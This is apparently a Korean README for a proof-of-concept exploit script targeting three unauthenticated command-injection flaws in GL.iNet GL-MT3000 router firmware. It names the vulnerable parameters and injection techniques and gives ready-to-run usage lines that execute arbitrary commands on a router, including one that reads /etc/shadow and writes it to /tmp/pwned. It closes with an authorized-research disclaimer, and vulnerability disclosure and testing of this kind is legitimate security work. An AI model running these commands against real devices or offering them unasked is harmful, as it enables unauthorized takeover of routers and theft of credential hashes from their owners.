
GL.iNet GL-MT3000 (Beryl AX) 여행용 라우터 펌웨어 <= 4.4.5에서 발견된 세 가지 인증 없는 명령 주입 취약점(CVE-2026-11450, CVE-2026-11451, CVE-2026-11452)에 대한 PoC입니다.
| CVE | CVSS | 기법 |
|---|---|---|
| CVE-2026-11450 | 7.3 | 버퍼 크기 불일치(0x40 vs 0x100)로 access() 게이트 우회, $()를 system()에 주입 |
| CVE-2026-11451 | 7.3 | FTP media_dir 매개변수의 작은따옴표 탈출로 셸 따옴표 규칙 깨뜨림 |
| CVE-2026-11452 | 7.3 | 큰따옴표로 감싼 printf 내부 Samba 비밀번호 매개변수에서 $() 명령 치환 |
세 가지 모두 인증이나 메서드 허용 목록 없이 dlopen/dlsym을 통해 플러그인을 로드하는 인증 없는 /cgi-bin/glc CGI 디스패처를 악용합니다.
# 세 가지 CVE 모두 악용
python3 poc.py http://192.168.8.1
# 특정 CVE 악용
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# 사용자 지정 명령 및 출력 파일
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
교육 및 공인된 보안 연구 목적으로만 사용하십시오. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에는 사용하지 마십시오.